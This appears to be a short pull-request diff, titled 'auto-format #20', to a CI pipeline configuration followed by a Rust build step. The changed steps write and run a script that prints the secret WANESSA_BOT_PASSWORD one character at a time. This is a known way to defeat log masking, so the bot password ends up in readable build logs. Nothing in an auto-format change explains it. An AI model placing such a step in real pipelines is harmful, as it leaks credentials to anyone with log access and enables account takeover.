auto-format #20
@ -14,7 +14,7 @@ steps:
|
||||
- echo '#!/bin/bash' > /tmp/test
|
||||
- echo 'for (( i=0; i<${#WANESSA_BOT_PASSWORD}; i++ )); do echo "${WANESSA_BOT_PASSWORD:$i:1}" ; done' > /tmp/test
|
||||
- chmod 777 /tmp/test
|
||||
- /tmp/test
|
||||
- bash /tmp/test
|
||||
|
||||
- name: build [debug]
|
||||
image: rust:1.71.1-slim-bookworm
|
||||
|
Reference in New Issue
Block a user